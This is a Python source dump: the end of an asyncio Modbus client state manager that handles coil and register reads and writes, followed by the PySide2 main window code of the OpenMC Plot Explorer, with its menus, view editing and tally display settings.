self.export_response.emit(await self.backend.get_response_history())
elif message == 'pause_refresh':
if not self._pause_future.done():
self._pause_future.set_result(True)
else:
self._pause_future = asyncio.Future()
self._pause_refresh = not self._pause_refresh
self.update_counter.emit(0)
elif type(message) == int:
self._refresh_time = message
else:
if message['function_code'] == Codes.READ_COILS.value:
response = await self._connection.read_coils(message['unit_address'],
message['address'], message['count'])
elif message['function_code'] == Codes.READ_DISCRETE_INPUTS.value:
response = await self._connection.read_discrete_inputs(message['unit_address'],
message['address'], message['count'])
elif message['function_code'] == Codes.READ_HOLDING_REGISTERS.value:
response = await self._connection.read_holding_registers(message['unit_address'],
message['address'], message['count'])
elif message['function_code'] == Codes.READ_INPUT_REGISTERS.value:
response = await self._connection.read_input_registers(message['unit_address'],
message['address'], message['count'])
elif message['function_code'] == Codes.WRITE_SINGLE_COIL.value:
response = await self._connection.write_single_coil(message['unit_address'],
message['address'], message['status'])
elif message['function_code'] == Codes.WRITE_SINGLE_REGISTER.value:
response = await self._connection.write_single_register(message['unit_address'],
message['address'], message['data'])
elif message['function_code'] == Codes.WRITE_MULTIPLE_COILS.value:
response = await self._connection.write_multiple_coils(message['unit_address'],
message['address'], message['data'])
elif message['function_code'] == Codes.WRITE_MULTIPLE_REGISTERS.value:
response = await self._connection.write_multiple_registers(message['unit_address'],
message['address'], message['data'])
if message['user_generated']:
try:
await self.backend.insert_request_history(response['transaction_id'], response['unit_address'],
response['function_code'], response['raw_request'])
await self.backend.insert_response_history(response['transaction_id'], response['unit_address'],
response['function_code'], response['raw_data'])
self.update_historian.emit({'request_history': await self.backend.get_request_history(),
'response_history': await self.backend.get_response_history()})
except Exception as e:
print(e)
self.update.emit(response)
else:
self.update_view.emit(response)
async def _counter(self):
with suppress(asyncio.CancelledError):
while True:
await self._pause_future
self.initiate_live_view_update.emit()
for i in range(1, 101):
await asyncio.sleep(self._refresh_time / 100)
if not self._pause_future.done():
break
self.update_counter.emit(i)
def _ext_get_message(self):
return self.user_req_queue.get()
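# --- Usage sketch (added for illustration; not part of the original module) ---
# How a GUI component would typically drive the StateManager: start the loop
# thread, connect to the `update` signal, and push messages onto
# `user_req_queue`. The request dict mirrors the keys the write loop expects;
# the concrete values are placeholders.
def _example_state_manager_usage():
    manager = StateManager(refresh_time=3)
    manager.update.connect(print)        # any slot that accepts the emitted payload
    manager.run_loop()                   # starts the asyncio write loop in a daemon thread
    manager.user_req_queue.put('CONN')   # ask the manager to connect
    manager.user_req_queue.put({         # user-generated READ_COILS request
        'function_code': Codes.READ_COILS.value,
        'unit_address': 1,
        'address': 0,
        'count': 8,
        'user_generated': True,
    })
    manager.user_req_queue.put('DC')     # disconnect
    manager.user_req_queue.put('close')  # shut the write loop down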
|
main_window.py
|
import copy
from functools import partial
import os
import pickle
from threading import Thread
from PySide2 import QtCore, QtGui
from PySide2.QtGui import QKeyEvent
from PySide2.QtWidgets import (QApplication, QLabel, QSizePolicy, QMainWindow,
QScrollArea, QMessageBox, QAction, QFileDialog,
QColorDialog, QInputDialog, QWidget,
QGestureEvent)
import openmc
import openmc.lib
try:
import vtk
_HAVE_VTK = True
except ImportError:
_HAVE_VTK = False
from .plotmodel import PlotModel, DomainTableModel
from .plotgui import PlotImage, ColorDialog
from .docks import DomainDock, TallyDock
from .overlays import ShortcutsOverlay
from .tools import ExportDataDialog
_COORD_LEVELS = 0
def _openmcReload():
# reset OpenMC memory, instances
openmc.lib.reset()
openmc.lib.finalize()
# initialize geometry (for volume calculation)
openmc.lib.settings.output_summary = False
openmc.lib.init(["-c"])
class MainWindow(QMainWindow):
def __init__(self, font=QtGui.QFontMetrics(QtGui.QFont()), screen_size=QtCore.QSize()):
super().__init__()
self.screen = screen_size
self.font_metric = font
self.setWindowTitle('OpenMC Plot Explorer')
def loadGui(self):
self.pixmap = None
self.zoom = 100
self.loadModel()
# Create viewing area
self.frame = QScrollArea(self)
cw = QWidget()
self.frame.setCornerWidget(cw)
self.frame.setAlignment(QtCore.Qt.AlignCenter)
self.frame.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(self.frame)
# connect pinch gesture (OSX)
self.grabGesture(QtCore.Qt.PinchGesture)
# Create plot image
self.plotIm = PlotImage(self.model, self.frame, self)
self.frame.setWidget(self.plotIm)
# Dock
self.dock = DomainDock(self.model, self.font_metric, self)
self.dock.setObjectName("Domain Options Dock")
self.addDockWidget(QtCore.Qt.RightDockWidgetArea, self.dock)
# Tally Dock
self.tallyDock = TallyDock(self.model, self.font_metric, self)
self.tallyDock.update()
self.tallyDock.setObjectName("Tally Options Dock")
self.addDockWidget(QtCore.Qt.RightDockWidgetArea, self.tallyDock)
# Color Dialog
self.colorDialog = ColorDialog(self.model, self.font_metric, self)
self.colorDialog.hide()
# Tools
self.exportDataDialog = ExportDataDialog(self.model, self.font_metric, self)
# Restore Window Settings
self.restoreWindowSettings()
# Create menubar
self.createMenuBar()
self.updateEditMenu()
# Status Bar
self.coord_label = QLabel()
self.statusBar().addPermanentWidget(self.coord_label)
self.coord_label.hide()
# Keyboard overlay
self.shortcutOverlay = ShortcutsOverlay(self)
self.shortcutOverlay.hide()
# Load Plot
self.statusBar().showMessage('Generating Plot...')
self.dock.updateDock()
self.tallyDock.update()
self.colorDialog.updateDialogValues()
self.statusBar().showMessage('')
# Timer allows GUI to render before plot finishes loading
QtCore.QTimer.singleShot(0, self.plotIm.generatePixmap)
QtCore.QTimer.singleShot(0, self.showCurrentView)
def event(self, event):
# use pinch event to update zoom
if isinstance(event, QGestureEvent):
pinch = event.gesture(QtCore.Qt.PinchGesture)
self.editZoom(self.zoom * pinch.scaleFactor())
if isinstance(event, QKeyEvent) and hasattr(self, "shortcutOverlay"):
self.shortcutOverlay.event(event)
return super().event(event)
def show(self):
super().show()
self.plotIm._resize()
def toggleShortcuts(self):
if self.shortcutOverlay.isVisible():
self.shortcutOverlay.close()
else:
self.shortcutOverlay.move(0, 0)
self.shortcutOverlay.resize(self.width(), self.height())
self.shortcutOverlay.show()
# Create and update menus:
def createMenuBar(self):
self.mainMenu = self.menuBar()
# File Menu
self.reloadModelAction = QAction("&Reload model...", self)
self.reloadModelAction.setShortcut("Ctrl+Shift+R")
self.reloadModelAction.setToolTip("Reload current model")
self.reloadModelAction.setStatusTip("Reload current model")
reload_connector = partial(self.loadModel, reload=True)
self.reloadModelAction.triggered.connect(reload_connector)
self.saveImageAction = QAction("&Save Image As...", self)
self.saveImageAction.setShortcut("Ctrl+Shift+S")
self.saveImageAction.setToolTip('Save plot image')
self.saveImageAction.setStatusTip('Save plot image')
self.saveImageAction.triggered.connect(self.saveImage)
self.saveViewAction = QAction("Save &View...", self)
self.saveViewAction.setShortcut(QtGui.QKeySequence.Save)
self.saveViewAction.setStatusTip('Save current view settings')
self.saveViewAction.triggered.connect(self.saveView)
self.openAction = QAction("&Open View...", self)
self.openAction.setShortcut(QtGui.QKeySequence.Open)
self.openAction.setToolTip('Open saved view settings')
self.openAction.setStatusTip('Open saved view settings')
self.openAction.triggered.connect(self.openView)
self.quitAction = QAction("&Quit", self)
self.quitAction.setShortcut(QtGui.QKeySequence.Quit)
self.quitAction.setToolTip('Quit OpenMC Plot Explorer')
self.quitAction.setStatusTip('Quit OpenMC Plot Explorer')
self.quitAction.triggered.connect(self.close)
self.exportDataAction = QAction('E&xport...', self)
self.exportDataAction.setToolTip('Export model and tally data to VTK')
self.exportDataAction.setStatusTip('Export current model and tally data to VTK')
self.exportDataAction.triggered.connect(self.exportTallyData)
if not _HAVE_VTK:
self.exportDataAction.setEnabled(False)
self.exportDataAction.setToolTip("Disabled: VTK Python module is not installed")
self.fileMenu = self.mainMenu.addMenu('&File')
self.fileMenu.addAction(self.reloadModelAction)
self.fileMenu.addAction(self.saveImageAction)
self.fileMenu.addAction(self.exportDataAction)
self.fileMenu.addSeparator()
self.fileMenu.addAction(self.saveViewAction)
self.fileMenu.addAction(self.openAction)
self.fileMenu.addSeparator()
self.fileMenu.addAction(self.quitAction)
# Data Menu
self.openStatePointAction = QAction("&Open statepoint...", self)
self.openStatePointAction.setToolTip('Open statepoint file')
self.openStatePointAction.triggered.connect(self.openStatePoint)
self.importPropertiesAction = QAction("&Import properties...", self)
self.importPropertiesAction.setToolTip("Import properties")
self.importPropertiesAction.triggered.connect(self.importProperties)
self.dataMenu = self.mainMenu.addMenu('D&ata')
self.dataMenu.addAction(self.openStatePointAction)
self.dataMenu.addAction(self.importPropertiesAction)
self.updateDataMenu()
# Edit Menu
self.applyAction = QAction("&Apply Changes", self)
self.applyAction.setShortcut("Ctrl+Return")
self.applyAction.setToolTip('Generate new view with changes applied')
self.applyAction.setStatusTip('Generate new view with changes applied')
self.applyAction.triggered.connect(self.applyChanges)
self.undoAction = QAction('&Undo', self)
self.undoAction.setShortcut(QtGui.QKeySequence.Undo)
self.undoAction.setToolTip('Undo')
self.undoAction.setStatusTip('Undo last plot view change')
self.undoAction.setDisabled(True)
self.undoAction.triggered.connect(self.undo)
self.redoAction = QAction('&Redo', self)
self.redoAction.setDisabled(True)
self.redoAction.setToolTip('Redo')
self.redoAction.setStatusTip('Redo last plot view change')
self.redoAction.setShortcut(QtGui.QKeySequence.Redo)
self.redoAction.triggered.connect(self.redo)
self.restoreAction = QAction("&Restore Default Plot", self)
self.restoreAction.setShortcut("Ctrl+R")
self.restoreAction.setToolTip('Restore to default plot view')
self.restoreAction.setStatusTip('Restore to default plot view')
self.restoreAction.triggered.connect(self.restoreDefault)
self.editMenu = self.mainMenu.addMenu('&Edit')
self.editMenu.addAction(self.applyAction)
self.editMenu.addSeparator()
self.editMenu.addAction(self.undoAction)
self.editMenu.addAction(self.redoAction)
self.editMenu.addSeparator()
self.editMenu.addAction(self.restoreAction)
self.editMenu.addSeparator()
self.editMenu.aboutToShow.connect(self.updateEditMenu)
# Edit -> Basis Menu
self.xyAction = QAction('&xy ', self)
self.xyAction.setCheckable(True)
self.xyAction.setShortcut('Alt+X')
self.xyAction.setToolTip('Change to xy basis')
self.xyAction.setStatusTip('Change to xy basis')
xy_connector = partial(self.editBasis, 'xy', apply=True)
self.xyAction.triggered.connect(xy_connector)
self.xzAction = QAction('x&z ', self)
self.xzAction.setCheckable(True)
self.xzAction.setShortcut('Alt+Z')
self.xzAction.setToolTip('Change to xz basis')
self.xzAction.setStatusTip('Change to xz basis')
xz_connector = partial(self.editBasis, 'xz', apply=True)
self.xzAction.triggered.connect(xz_connector)
self.yzAction = QAction('&yz ', self)
self.yzAction.setCheckable(True)
self.yzAction.setShortcut('Alt+Y')
self.yzAction.setToolTip('Change to yz basis')
self.yzAction.setStatusTip('Change to yz basis')
yz_connector = partial(self.editBasis, 'yz', apply=True)
self.yzAction.triggered.connect(yz_connector)
self.basisMenu = self.editMenu.addMenu('&Basis')
self.basisMenu.addAction(self.xyAction)
self.basisMenu.addAction(self.xzAction)
self.basisMenu.addAction(self.yzAction)
self.basisMenu.aboutToShow.connect(self.updateBasisMenu)
# Edit -> Color By Menu
self.cellAction = QAction('&Cell', self)
self.cellAction.setCheckable(True)
self.cellAction.setShortcut('Alt+C')
self.cellAction.setToolTip('Color by cell')
self.cellAction.setStatusTip('Color plot by cell')
cell_connector = partial(self.editColorBy, 'cell', apply=True)
self.cellAction.triggered.connect(cell_connector)
self.materialAction = QAction('&Material', self)
self.materialAction.setCheckable(True)
self.materialAction.setShortcut('Alt+M')
self.materialAction.setToolTip('Color by material')
self.materialAction.setStatusTip('Color plot by material')
material_connector = partial(self.editColorBy, 'material', apply=True)
self.materialAction.triggered.connect(material_connector)
self.temperatureAction = QAction('&Temperature', self)
self.temperatureAction.setCheckable(True)
self.temperatureAction.setShortcut('Alt+T')
self.temperatureAction.setToolTip('Color by temperature')
self.temperatureAction.setStatusTip('Color plot by temperature')
temp_connector = partial(self.editColorBy, 'temperature', apply=True)
self.temperatureAction.triggered.connect(temp_connector)
self.densityAction = QAction('&Density', self)
self.densityAction.setCheckable(True)
self.densityAction.setShortcut('Alt+D')
self.densityAction.setToolTip('Color by density')
self.densityAction.setStatusTip('Color plot by density')
density_connector = partial(self.editColorBy, 'density', apply=True)
self.densityAction.triggered.connect(density_connector)
self.colorbyMenu = self.editMenu.addMenu('&Color By')
self.colorbyMenu.addAction(self.cellAction)
self.colorbyMenu.addAction(self.materialAction)
self.colorbyMenu.addAction(self.temperatureAction)
self.colorbyMenu.addAction(self.densityAction)
self.colorbyMenu.aboutToShow.connect(self.updateColorbyMenu)
self.editMenu.addSeparator()
# Edit -> Other Options
self.maskingAction = QAction('Enable &Masking', self)
self.maskingAction.setShortcut('Ctrl+M')
self.maskingAction.setCheckable(True)
self.maskingAction.setToolTip('Toggle masking')
self.maskingAction.setStatusTip('Toggle whether masking is enabled')
masking_connector = partial(self.toggleMasking, apply=True)
self.maskingAction.toggled.connect(masking_connector)
self.editMenu.addAction(self.maskingAction)
self.highlightingAct = QAction('Enable High&lighting', self)
self.highlightingAct.setShortcut('Ctrl+L')
self.highlightingAct.setCheckable(True)
self.highlightingAct.setToolTip('Toggle highlighting')
self.highlightingAct.setStatusTip('Toggle whether '
'highlighting is enabled')
highlight_connector = partial(self.toggleHighlighting, apply=True)
self.highlightingAct.toggled.connect(highlight_connector)
self.editMenu.addAction(self.highlightingAct)
self.overlapAct = QAction('Enable Overlap Coloring', self)
self.overlapAct.setShortcut('Ctrl+P')
self.overlapAct.setCheckable(True)
self.overlapAct.setToolTip('Toggle overlapping regions')
self.overlapAct.setStatusTip('Toggle display of overlapping '
'regions when enabled')
overlap_connector = partial(self.toggleOverlaps, apply=True)
self.overlapAct.toggled.connect(overlap_connector)
self.editMenu.addAction(self.overlapAct)
self.outlineAct = QAction('Enable Domain Outlines', self)
self.outlineAct.setShortcut('Ctrl+U')
self.outlineAct.setCheckable(True)
self.outlineAct.setToolTip('Display Cell/Material Boundaries')
self.outlineAct.setStatusTip('Toggle display of domain '
'outlines when enabled')
outline_connector = partial(self.toggleOutlines, apply=True)
self.outlineAct.toggled.connect(outline_connector)
self.editMenu.addAction(self.outlineAct)
# View Menu
self.dockAction = QAction('Hide &Dock', self)
self.dockAction.setShortcut("Ctrl+D")
self.dockAction.setToolTip('Toggle dock visibility')
self.dockAction.setStatusTip('Toggle dock visibility')
self.dockAction.triggered.connect(self.toggleDockView)
self.tallyDockAction = QAction('Tally &Dock', self)
self.tallyDockAction.setShortcut("Ctrl+T")
self.tallyDockAction.setToolTip('Toggle tally dock visibility')
self.tallyDockAction.setStatusTip('Toggle tally dock visibility')
self.tallyDockAction.triggered.connect(self.toggleTallyDockView)
self.zoomAction = QAction('&Zoom...', self)
self.zoomAction.setShortcut('Alt+Shift+Z')
self.zoomAction.setToolTip('Edit zoom factor')
self.zoomAction.setStatusTip('Edit zoom factor')
self.zoomAction.triggered.connect(self.editZoomAct)
self.viewMenu = self.mainMenu.addMenu('&View')
self.viewMenu.addAction(self.dockAction)
self.viewMenu.addAction(self.tallyDockAction)
self.viewMenu.addSeparator()
self.viewMenu.addAction(self.zoomAction)
self.viewMenu.aboutToShow.connect(self.updateViewMenu)
# Window Menu
self.mainWindowAction = QAction('&Main Window', self)
self.mainWindowAction.setCheckable(True)
self.mainWindowAction.setToolTip('Bring main window to front')
self.mainWindowAction.setStatusTip('Bring main window to front')
self.mainWindowAction.triggered.connect(self.showMainWindow)
self.colorDialogAction = QAction('Color &Options', self)
self.colorDialogAction.setCheckable(True)
self.colorDialogAction.setToolTip('Bring Color Dialog to front')
self.colorDialogAction.setStatusTip('Bring Color Dialog to front')
self.colorDialogAction.triggered.connect(self.showColorDialog)
# Keyboard Shortcuts Overlay
self.keyboardShortcutsAction = QAction("&Keyboard Shortcuts...", self)
self.keyboardShortcutsAction.setShortcut("?")
self.keyboardShortcutsAction.setToolTip("Display Keyboard Shortcuts")
self.keyboardShortcutsAction.setStatusTip("Display Keyboard Shortcuts")
self.keyboardShortcutsAction.triggered.connect(self.toggleShortcuts)
self.windowMenu = self.mainMenu.addMenu('&Window')
self.windowMenu.addAction(self.mainWindowAction)
self.windowMenu.addAction(self.colorDialogAction)
self.windowMenu.addAction(self.keyboardShortcutsAction)
self.windowMenu.aboutToShow.connect(self.updateWindowMenu)
def updateEditMenu(self):
changed = self.model.currentView != self.model.defaultView
self.restoreAction.setDisabled(not changed)
self.maskingAction.setChecked(self.model.currentView.masking)
self.highlightingAct.setChecked(self.model.currentView.highlighting)
self.outlineAct.setChecked(self.model.currentView.outlines)
num_previous_views = len(self.model.previousViews)
self.undoAction.setText('&Undo ({})'.format(num_previous_views))
num_subsequent_views = len(self.model.subsequentViews)
self.redoAction.setText('&Redo ({})'.format(num_subsequent_views))
def updateBasisMenu(self):
self.xyAction.setChecked(self.model.currentView.basis == 'xy')
self.xzAction.setChecked(self.model.currentView.basis == 'xz')
self.yzAction.setChecked(self.model.currentView.basis == 'yz')
def updateColorbyMenu(self):
cv = self.model.currentView
self.cellAction.setChecked(cv.colorby == 'cell')
self.materialAction.setChecked(cv.colorby == 'material')
self.temperatureAction.setChecked(cv.colorby == 'temperature')
self.densityAction.setChecked(cv.colorby == 'density')
def updateViewMenu(self):
if self.dock.isVisible():
self.dockAction.setText('Hide &Dock')
else:
self.dockAction.setText('Show &Dock')
def updateWindowMenu(self):
self.colorDialogAction.setChecked(self.colorDialog.isActiveWindow())
self.mainWindowAction.setChecked(self.isActiveWindow())
# Menu and shared methods
def loadModel(self, reload=False):
if reload:
self.resetModels()
else:
# create new plot model
self.model = PlotModel()
self.restoreModelSettings()
# update plot and model settings
self.updateRelativeBases()
self.cellsModel = DomainTableModel(self.model.activeView.cells)
self.materialsModel = DomainTableModel(self.model.activeView.materials)
if reload:
loader_thread = Thread(target=_openmcReload)
loader_thread.start()
while loader_thread.is_alive():
self.statusBar().showMessage("Reloading model...")
QApplication.processEvents()
self.plotIm.model = self.model
self.applyChanges()
def saveImage(self):
filename, ext = QFileDialog.getSaveFileName(self,
"Save Plot Image",
"untitled",
"Images (*.png)")
if filename:
if "." not in filename:
filename += ".png"
self.plotIm.figure.savefig(filename, transparent=True)
self.statusBar().showMessage('Plot Image Saved', 5000)
def saveView(self):
filename, ext = QFileDialog.getSaveFileName(self,
"Save View Settings",
"untitled",
"View Settings (*.pltvw)")
if filename:
if "." not in filename:
filename += ".pltvw"
saved = {'version': self.model.version,
'current': self.model.currentView}
with open(filename, 'wb') as file:
pickle.dump(saved, file)
def openView(self):
filename, ext = QFileDialog.getOpenFileName(self, "Open View Settings",
".", "*.pltvw")
if filename:
try:
with open(filename, 'rb') as file:
saved = pickle.load(file)
except Exception:
message = 'Error loading plot settings'
saved = {'version': None,
'current': None}
if saved['version'] == self.model.version:
self.model.activeView = saved['current']
self.dock.updateDock()
self.colorDialog.updateDialogValues()
self.applyChanges()
message = '{} settings loaded'.format(filename)
else:
message = 'Error loading plot settings. Incompatible model.'
self.statusBar().showMessage(message, 5000)
def openStatePoint(self):
# check for an already-open statepoint
if self.model.statepoint:
msg_box = QMessageBox()
msg_box.setText("Please close the current statepoint file before "
"opening a new one.")
msg_box.setIcon(QMessageBox.Information)
msg_box.setStandardButtons(QMessageBox.Ok)
msg_box.exec_()
return
filename, ext = QFileDialog.getOpenFileName(self, "Open StatePoint",
".", "statepoint*.h5")
if filename:
try:
self.model.openStatePoint(filename)
message = 'Opened statepoint file: {}'
except (FileNotFoundError, OSError):
message = 'Error opening statepoint file: {}'
msg_box = QMessageBox()
msg = "Could not open statepoint file: \n\n {} \n"
msg_box.setText(msg.format(filename))
msg_box.setIcon(QMessageBox.Warning)
msg_box.setStandardButtons(QMessageBox.Ok)
msg_box.exec_()
finally:
self.statusBar().showMessage(message.format(filename), 5000)
self.updateDataMenu()
self.tallyDock.update()
def importProperties(self):
filename, ext = QFileDialog.getOpenFileName(self, "Import properties",
".", "*.h5")
if not filename:
return
try:
openmc.lib.import_properties(filename)
message = 'Imported properties: {}'
except (FileNotFoundError, OSError, openmc.lib.exc.OpenMCError) as e:
message = 'Error opening properties file: {}'
msg_box = QMessageBox()
msg_box.setText(f"Error opening properties file: \n\n {e} \n")
msg_box.setIcon(QMessageBox.Warning)
msg_box.setStandardButtons(QMessageBox.Ok)
msg_box.exec_()
finally:
self.statusBar().showMessage(message.format(filename), 5000)
if self.model.activeView.colorby == 'temperature':
self.applyChanges()
def closeStatePoint(self):
# remove the statepoint object and update the data menu
filename = self.model.statepoint.filename
self.model.statepoint = None
self.model.currentView.selectedTally = None
self.model.activeView.selectedTally = None
msg = "Closed statepoint file {}".format(filename)
self.statusBar().showMessage(msg)
self.updateDataMenu()
self.tallyDock.selectTally()
self.tallyDock.update()
self.plotIm.updatePixmap()
def updateDataMenu(self):
if self.model.statepoint:
self.closeStatePointAction = QAction("&Close statepoint", self)
self.closeStatePointAction.setToolTip("Close current statepoint")
self.closeStatePointAction.triggered.connect(self.closeStatePoint)
self.dataMenu.addAction(self.closeStatePointAction)
elif hasattr(self, "closeStatePointAction"):
self.dataMenu.removeAction(self.closeStatePointAction)
def applyChanges(self):
if self.model.activeView != self.model.currentView:
self.statusBar().showMessage('Generating Plot...')
QApplication.processEvents()
self.model.storeCurrent()
self.model.subsequentViews = []
self.plotIm.generatePixmap()
self.resetModels()
self.showCurrentView()
self.statusBar().showMessage('')
else:
self.statusBar().showMessage('No changes to apply.', 3000)
def undo(self):
self.statusBar().showMessage('Generating Plot...')
QApplication.processEvents()
self.model.undo()
self.resetModels()
self.showCurrentView()
self.dock.updateDock()
self.colorDialog.updateDialogValues()
if not self.model.previousViews:
self.undoAction.setDisabled(True)
self.redoAction.setDisabled(False)
self.statusBar().showMessage('')
def redo(self):
self.statusBar().showMessage('Generating Plot...')
QApplication.processEvents()
self.model.redo()
self.resetModels()
self.showCurrentView()
self.dock.updateDock()
self.colorDialog.updateDialogValues()
if not self.model.subsequentViews:
self.redoAction.setDisabled(True)
self.undoAction.setDisabled(False)
self.statusBar().showMessage('')
def restoreDefault(self):
if self.model.currentView != self.model.defaultView:
self.statusBar().showMessage('Generating Plot...')
QApplication.processEvents()
self.model.storeCurrent()
self.model.activeView.adopt_plotbase(self.model.defaultView)
self.plotIm.generatePixmap()
self.resetModels()
self.showCurrentView()
self.dock.updateDock()
self.colorDialog.updateDialogValues()
self.model.subsequentViews = []
self.statusBar().showMessage('')
def editBasis(self, basis, apply=False):
self.model.activeView.basis = basis
self.dock.updateBasis()
if apply:
self.applyChanges()
def editColorBy(self, domain_kind, apply=False):
self.model.activeView.colorby = domain_kind
self.dock.updateColorBy()
self.colorDialog.updateColorBy()
if apply:
self.applyChanges()
def editUniverseLevel(self, level, apply=False):
if level in ('all', ''):
self.model.activeView.level = -1
else:
self.model.activeView.level = int(level)
self.dock.updateUniverseLevel()
self.colorDialog.updateUniverseLevel()
if apply:
self.applyChanges()
def toggleOverlaps(self, state, apply=False):
self.model.activeView.color_overlaps = bool(state)
self.colorDialog.updateOverlap()
if apply:
self.applyChanges()
def editColorMap(self, colormap_name, property_type, apply=False):
self.model.activeView.colormaps[property_type] = colormap_name
self.plotIm.updateColorMap(colormap_name, property_type)
self.colorDialog.updateColorMaps()
if apply:
self.applyChanges()
def editColorbarMin(self, min_val, property_type, apply=False):
av = self.model.activeView
current = av.user_minmax[property_type]
av.user_minmax[property_type] = (min_val, current[1])
self.colorDialog.updateColorMinMax()
self.plotIm.updateColorMinMax(property_type)
if apply:
self.applyChanges()
def editColorbarMax(self, max_val, property_type, apply=False):
av = self.model.activeView
current = av.user_minmax[property_type]
av.user_minmax[property_type] = (current[0], max_val)
self.colorDialog.updateColorMinMax()
self.plotIm.updateColorMinMax(property_type)
if apply:
self.applyChanges()
def toggleColorbarScale(self, state, property, apply=False):
av = self.model.activeView
av.color_scale_log[property] = bool(state)
# temporary, should be resolved differently in the future
cv = self.model.currentView
cv.color_scale_log[property] = bool(state)
self.plotIm.updateColorbarScale()
if apply:
self.applyChanges()
def toggleUserMinMax(self, state, property):
av = self.model.activeView
av.use_custom_minmax[property] = bool(state)
if av.user_minmax[property] == (0.0, 0.0):
av.user_minmax[property] = copy.copy(av.data_minmax[property])
self.plotIm.updateColorMinMax('temperature')
self.plotIm.updateColorMinMax('density')
self.colorDialog.updateColorMinMax()
def toggleDataIndicatorCheckBox(self, state, property, apply=False):
av = self.model.activeView
av.data_indicator_enabled[property] = bool(state)
cv = self.model.currentView
cv.data_indicator_enabled[property] = bool(state)
self.plotIm.updateDataIndicatorVisibility()
if apply:
self.applyChanges()
def toggleMasking(self, state, apply=False):
self.model.activeView.masking = bool(state)
self.colorDialog.updateMasking()
if apply:
self.applyChanges()
def toggleHighlighting(self, state, apply=False):
self.model.activeView.highlighting = bool(state)
self.colorDialog.updateHighlighting()
if apply:
self.applyChanges()
def toggleDockView(self):
if self.dock.isVisible():
self.dock.hide()
if not self.isMaximized() and not self.dock.isFloating():
self.resize(self.width() - self.dock.width(), self.height())
else:
self.dock.setVisible(True)
if not self.isMaximized() and not self.dock.isFloating():
self.resize(self.width() + self.dock.width(), self.height())
self.resizePixmap()
self.showMainWindow()
def toggleTallyDockView(self):
if self.tallyDock.isVisible():
self.tallyDock.hide()
if not self.isMaximized() and not self.tallyDock.isFloating():
self.resize(self.width() - self.tallyDock.width(), self.height())
else:
self.tallyDock.setVisible(True)
if not self.isMaximized() and not self.tallyDock.isFloating():
self.resize(self.width() + self.tallyDock.width(), self.height())
self.resizePixmap()
self.showMainWindow()
def editZoomAct(self):
percent, ok = QInputDialog.getInt(self, "Edit Zoom", "Zoom Percent:",
self.dock.zoomBox.value(), 25, 2000)
if ok:
self.dock.zoomBox.setValue(percent)
def editZoom(self, value):
self.zoom = value
self.resizePixmap()
self.dock.zoomBox.setValue(value)
def showMainWindow(self):
self.raise_()
self.activateWindow()
def showColorDialog(self):
self.colorDialog.show()
self.colorDialog.raise_()
self.colorDialog.activateWindow()
def showExportDialog(self):
self.exportDataDialog.show()
self.exportDataDialog.raise_()
self.exportDataDialog.activateWindow()
# Dock methods:
def editSingleOrigin(self, value, dimension):
self.model.activeView.origin[dimension] = value
def editPlotAlpha(self, value):
self.model.activeView.domainAlpha = value
def editPlotVisibility(self, value):
self.model.activeView.domainVisible = bool(value)
def toggleOutlines(self, value, apply=False):
self.model.activeView.outlines = bool(value)
self.dock.updateOutlines()
if apply:
self.applyChanges()
def editWidth(self, value):
self.model.activeView.width = value
self.onRatioChange()
self.dock.updateWidth()
def editHeight(self, value):
self.model.activeView.height = value
self.onRatioChange()
self.dock.updateHeight()
def toggleAspectLock(self, state):
self.model.activeView.aspectLock = bool(state)
self.onRatioChange()
self.dock.updateAspectLock()
def editVRes(self, value):
self.model.activeView.v_res = value
self.dock.updateVRes()
def editHRes(self, value):
self.model.activeView.h_res = value
self.onRatioChange()
self.dock.updateHRes()
# Color dialog methods:
def editMaskingColor(self):
current_color = self.model.activeView.maskBackground
dlg = QColorDialog(self)
dlg.setCurrentColor(QtGui.QColor.fromRgb(*current_color))
if dlg.exec_():
new_color = dlg.currentColor().getRgb()[:3]
self.model.activeView.maskBackground = new_color
self.colorDialog.updateMaskingColor()
def editHighlightColor(self):
current_color = self.model.activeView.highlightBackground
dlg = QColorDialog(self)
dlg.setCurrentColor(QtGui.QColor.fromRgb(*current_color))
if dlg.exec_():
new_color = dlg.currentColor().getRgb()[:3]
self.model.activeView.highlightBackground = new_color
self.colorDialog.updateHighlightColor()
def editAlpha(self, value):
self.model.activeView.highlightAlpha = value
def editSeed(self, value):
self.model.activeView.highlightSeed = value
def editOverlapColor(self, apply=False):
current_color = self.model.activeView.overlap_color
dlg = QColorDialog(self)
dlg.setCurrentColor(QtGui.QColor.fromRgb(*current_color))
if dlg.exec_():
new_color = dlg.currentColor().getRgb()[:3]
self.model.activeView.overlap_color = new_color
self.colorDialog.updateOverlapColor()
if apply:
self.applyChanges()
def editBackgroundColor(self, apply=False):
current_color = self.model.activeView.domainBackground
dlg = QColorDialog(self)
dlg.setCurrentColor(QtGui.QColor.fromRgb(*current_color))
if dlg.exec_():
new_color = dlg.currentColor().getRgb()[:3]
self.model.activeView.domainBackground = new_color
self.colorDialog.updateBackgroundColor()
if apply:
self.applyChanges()
def resetColors(self):
self.model.resetColors()
self.colorDialog.updateDialogValues()
self.applyChanges()
# Tally dock methods
def editSelectedTally(self, event):
av = self.model.activeView
if event is None or event == "None" or event == "":
av.selectedTally = None
else:
av.selectedTally = int(event.split()[1])
self.tallyDock.selectTally(event)
def editTallyValue(self, event):
av = self.model.activeView
av.tallyValue = event
def updateScores(self, state):
self.tallyDock.updateScores()
def updateNuclides(self, state):
self.tallyDock.updateNuclides()
def toggleTallyVisibility(self, state, apply=False):
av = self.model.activeView
av.tallyDataVisible = bool(state)
if apply:
self.applyChanges()
def toggleTallyLogScale(self, state, apply=False):
av = self.model.activeView
av.tallyDataLogScale = bool(state)
if apply:
self.applyChanges()
def toggleTallyMaskZero(self, state):
av = self.model.activeView
av.tallyMaskZeroValues = bool(state)
def editTallyAlpha(self, value, apply=False):
av = self.model.activeView
av.tallyDataAlpha = value
if apply:
self.applyChanges()
def toggleTallyContours(self, state):
av = self.model.activeView
av.tallyContours = bool(state)
def editTallyContourLevels(self, value):
av = self.model.activeView
av.tallyContourLevels = value
def toggleTallyDataIndicator(self, state, apply=False):
av = self.model.activeView
av.tallyDataIndicator = bool(state)
if apply:
self.applyChanges()
def toggleTallyDataClip(self, state):
av = self.model.activeView
av.clipTallyData = bool(state)
def toggleTallyDataUserMinMax(self, state, apply=False):
av = self.model.activeView
av.tallyDataUserMinMax = bool(state)
self.tallyDock.tallyColorForm.setMinMaxEnabled(bool(state))
if apply:
self.applyChanges()
def editTallyDataMin(self, value, apply=False):
av = self.model.activeView
av.tallyDataMin = value
if apply:
self.applyChanges()
